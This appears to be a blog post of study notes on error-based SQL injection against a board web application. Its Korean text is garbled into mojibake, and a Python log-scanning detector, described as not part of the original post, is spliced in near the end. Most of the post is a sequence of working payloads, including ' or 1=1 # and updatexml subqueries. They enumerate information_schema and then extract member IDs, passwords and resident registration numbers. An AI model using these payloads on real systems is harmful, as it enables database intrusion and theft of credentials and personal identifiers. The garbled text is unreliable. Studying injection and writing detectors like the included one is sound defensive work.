
SQL Injection


SQL ์ธ์ ์…˜ ํ”„๋กœ์„ธ์Šค
1. ์—๋Ÿฌ ์œ ๋ฌด / ์ทจ์•ฝ์  ์ง„๋‹จ

๊ฐ•์ œ๋กœ ์—๋Ÿฌ๋ฅผ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ๋ฐฉ๋ฒ•

 

' ์ž…๋ ฅ > ์—๋Ÿฌ ๋ฐœ์ƒ
'%' or writer like '%'%' or content like '%'%' order by idx desc

SELECT * FROM board WHERE title = '  ';		# SQL๋ฌธ ์˜ˆ์ธก ๊ฐ€๋Šฅ

 

-> Application

1. An error occurs in the keyword search

2. An error occurs in the URL address

3. An error also occurs in sorting

-> Vulnerability diagnosis

A way of making a normal/abnormal response appear when a malformed query is sent between the web server and the DB server

Try adding or subtracting on idx

3+2 does not work > because of URL encoding the + sign is treated as a space
To use +, URL-encode it: + = %2b, so 3%2b2 moves to post number 5
Searching ' or 1=1 # in the keyword input box shows every post
Searching ' or 1=2# in the keyword input box returns no posts at all

SELECT * FROM board WHERE title = '  ';			# original query
SELECT * FROM board WHERE title = '' or 1=1 # ';	# True
SELECT * FROM board WHERE title = '' and 1=2 # ';	# False

Using ' or 1=1 and '%'=' in the keyword input box means no comment is needed

Method that wipes out the rest of the statement with a comment > Terminating Query

Method that keeps the rest of the statement intact > In-line Query

 

2. Environment analysis

MySQL / Oracle / MsSQL

> Each one has different functions and metadata, so environment analysis must always be done

1. Concatenation operator

MySQL : space  ex) ' test ' == ' te ' ' st '

Oracle : ||  ex) ' test ' == ' te ' || ' st '

MsSQL : +  ex) ' test ' == ' te ' + ' st '

When te' 'st is searched, it is searched as test >> can infer that it is MySQL
Oracle functions cannot be used
MsSQL functions cannot be used
Can search in descending order

2. DBMS์˜ ๊ณ ์œ  ํ•จ์ˆ˜

MySQL : mid(), substr(), substring()

Oracle : substr()

MsSQL : substring()

 

 # test๋ผ๋Š” ๊ธ€์ž์—์„œ 1๋ฒˆ์งธ ๊ธ€์ž์—์„œ 1๊ฐœ๊นŒ์ง€ ์ถœ๋ ฅํ•˜์‹œ์˜ค

substr('test',1,1) = t

 # test๋ผ๋Š” ๊ธ€์ž์—์„œ 3๋ฒˆ์งธ ๊ธ€์ž์—์„œ 2๊ฐœ๊นŒ์ง€ ์ถœ๋ ฅํ•˜์‹œ์˜ค

substr('test', 3, 2) = st

 

3. Choosing an attack technique

- Error Based : ' and updatexml (0x0a,concat(0x0a,database()),0x0a) #

- Union Based

- Blind Based

- Time Based

 

Difference in information extraction speed

Union > Error >>>>>>> Blind >>>>>>> Time

 

information_schema : the database that gathers the metadata

 


4. Completing the metadata map

Finding the 3 basic pieces of information

database()

system_user()

version()

 

 ' and updatexml (0x0a,concat(0x0a,(attack statement)),0x0a) #


' and updatexml (0x0a,concat(0x0a,system_user()),0x0a) #

๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ๋งคํ•‘

SCHEMATA : ํ˜„์žฌ ์‚ฌ์šฉ์ค‘์ธ ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ๋ชฉ๋ก

TABLES : ํ˜„์žฌ ์‚ฌ์šฉ์ค‘์ธ ํ…Œ์ด๋ธ” ๋ชฉ๋ก

COLUMNS : ํ˜„์žฌ ์‚ฌ์šฉ์ค‘์ธ ์ปฌ๋Ÿผ ๋ชฉ๋ก

 

๊ฐ€์žฅ ์ฒ˜์Œ์— DB ๋ชฉ๋กํ™”

< ์ˆœ์ฐจ ์ ‘๊ทผ ๋ฐฉ์‹ >

๋งŽ์€ ์‹œ๊ฐ„๊ณผ ํŠธ๋ž˜ํ”ฝ์„ ์†Œ๋ชจํ•˜์ง€๋งŒ ์ค‘์š” ์ •๋ณด๋ฅผ ๋†“์น  ํ™•๋ฅ ์ด ์ ๋‹ค

SELECT * FROM information_schema.schemata

SCHEMA_NAME : ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„์„ ๋ชจ์•„๋†“์€ ํ•ญ๋ชฉ
TABLE_SCHEMA๋ผ๋Š” ์ปฌ๋Ÿผ์ด ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ , TABLE_NAME์ด๋ผ๋Š” ์ปฌ๋Ÿผ์ด ํ…Œ์ด๋ธ” ์ด๋ฆ„
TABLE_SCHEMA : ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„ , TABLE_NAME : ํ…Œ์ด๋ธ” ์ด๋ฆ„, COLUMN_NAME : ์ปฌ๋Ÿผ ์ด๋ฆ„

information_schema ํ•ญ๋ชฉ์—์„œ phpmyadmin ์ด๋ผ๋Š” ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ๋งต์„ ์™„์„ฑ

< ๋น„ ์ˆœ์ฐจ ์ ‘๊ทผ ๋ฐฉ์‹ >

์ ์€ ์‹œ๊ฐ„๊ณผ ํŠธ๋ž˜ํ”ฝ์„ ์†Œ๋ชจํ•˜์ง€๋ง‰ ์ค‘์š” ์ •๋ณด๋ฅผ ๋†“์น  ํ™•๋ฅ ์ด ๋†’๋‹ค

 

SELECT * FROM information_schema.tables WHERE table_name like '%mem%'

 

' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata )),0x0a) #

 

Subquery : it must have exactly 1 column and 1 row. > use a LIMIT clause.

' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT SCHEMA_NAME FROM information_schema.schemata LIMIT 1,1)),0x0a) #

5. Information extraction

' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema='board' LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 2,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 3,1)),0x0a) #
' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_name='members' LIMIT 3,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT COLUMN_NAME FROM information_schema.columns WHERE table_schema='board' LIMIT 4,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT id FROM members LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT id FROM members LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT password FROM members LIMIT 0,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT password FROM members LIMIT 1,1)),0x0a) #

' and updatexml (0x0a,concat(0x0a,(SELECT jumin FROM members LIMIT 0,1)),0x0a) #
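A detection-side companion to the payloads in sections 1, 3 and 4, added here and not part of the original post: it URL-decodes the query string of constructed web-server log lines the way the server does (+ becomes a space, %2b becomes +, as in the idx example) and flags the patterns these notes use: a quote followed by a tautology, comment terminators, updatexml calls, information_schema references, arithmetic on a numeric id, and the te' 'st concatenation probe. The log format, field names and rule names are assumptions made for the example.

```python
"""Added example (not from the original post): flag requests carrying the
injection patterns described in the notes, run over constructed log lines.
Assumptions: combined-log style lines, and the rule names are our own."""
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines; the request targets mirror the notes' payloads.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2022:10:00:01 +0900] "GET /board.php?keyword=test HTTP/1.1" 200 512
10.0.0.7 - - [01/Jul/2022:10:00:02 +0900] "GET /view.php?idx=3%2b2 HTTP/1.1" 200 800
10.0.0.7 - - [01/Jul/2022:10:00:03 +0900] "GET /board.php?keyword=%27+or+1%3D1+%23 HTTP/1.1" 200 9000
10.0.0.7 - - [01/Jul/2022:10:00:04 +0900] "GET /board.php?keyword=%27+and+updatexml(0x0a%2Cconcat(0x0a%2Cdatabase())%2C0x0a)+%23 HTTP/1.1" 500 300
10.0.0.9 - - [01/Jul/2022:10:00:05 +0900] "GET /board.php?keyword=te%27+%27st HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2022:10:00:06 +0900] "GET /board.php?keyword=information_schema.tables HTTP/1.1" 200 0
"""

# Pulls method, request target and status out of a combined-log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Each rule is applied to the *decoded* parameter value, never to the raw URL,
# so encoded variants of the same payload hit the same rule.
RULES = [
    ("tautology", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),       # ' or 1=1
    ("comment-terminator", re.compile(r"(#|--\s)")),                    # terminating query
    ("error-based-func", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("metadata-probe", re.compile(r"\binformation_schema\b", re.I)),
    ("arithmetic-on-id", re.compile(r"^\d+\s*[+-]\s*\d+$")),            # idx=3+2 probe
    ("string-concat-probe", re.compile(r"'\s+'")),                      # te' 'st fingerprint
]


def decode_params(target: str) -> dict:
    # parse_qsl applies the same decoding the web server applies: '+' becomes a
    # space and '%2b' becomes a literal '+', which is why 3+2 fails but 3%2b2 works.
    return dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))


def scan_line(line: str) -> Optional[dict]:
    m = REQUEST_RE.search(line)
    if not m:
        return None
    hits = []
    for name, value in decode_params(m.group("target")).items():
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.append((name, rule))
    if not hits:
        return None
    return {"target": m.group("target"), "status": int(m.group("status")), "hits": hits}


def scan_log(text: str) -> list:
    # One finding per request that triggered at least one rule.
    return [r for r in (scan_line(line) for line in text.splitlines()) if r]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["status"], finding["target"], finding["hits"])
```

A 500 status next to an updatexml hit is the error-based case from section 3: the server surfaced the database error, so pairing the decoded-parameter match with the response status separates a blocked probe from one that actually produced output.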
๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
UNION SQL INJECTION  (0) 2022.06.30
2022-06-27  (0) 2022.06.28
2022-06-23  (0) 2022.06.28
2022-06-22  (0) 2022.06.28
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.